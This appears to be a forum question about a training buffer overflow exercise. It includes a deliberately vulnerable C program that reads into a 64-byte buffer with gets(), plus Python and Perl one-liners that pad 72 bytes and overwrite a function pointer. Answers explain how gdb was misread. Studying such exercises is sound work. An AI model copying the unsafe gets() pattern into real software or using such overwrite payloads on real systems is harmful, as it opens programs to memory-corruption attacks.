# Unexpected value appears on stack when attempting buffer overflow

Tags: gcc, stack-overflow

I am trying to learn more about cyber security, in this case about buffer overflows. I have a simple code that I want to change flow of:

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}
```

By using some tools I have determined that function pointer (fp) gets it value updated after 72 characters have entered the buffer. The function `win()` is located at value `0xe5894855` so after 72 characters I need to provide that value to buffer for it to jump to the desired function.

However I am facing this issue:
[image]

By putting Python3's `print("A"*18*4 + "UH" + "\x89" + "\xe5")` into input of given C code, I should be getting desired value `0xe5894855` in section marked with red. But instead, I am getting highlighted malformed hex from somewhere. (89 is getting extra C2 and incorrect e5 value is overflowing to next part of stack) (value in those parts of stack are zero initially, but changed into that once overflow is attempted).

Why is this happening? Am I putting hex values into C program incorrectly?

Edit: Still have not figured out why passing hex through python did not work, but I found a different method, by using Perl: `perl -e 'print "A"x4x18 . "\x55\x48\x89\xe5"'`, which did work, and address I needed to jump to was also incorrect (which I also fixed)

Comment: BTW, gdb's x command displays the contents of the memory address or register you give as its argument, so `x win` is showing the first few bytes of win's code, not its address. 0xe58948 is `mov    %rsp,%rbp`.

Comment: @Mark correct, I was able to figure out the correct address and execute the code, but I am still unable to enter hex chars via Python (although all tutorials use python for such stuff)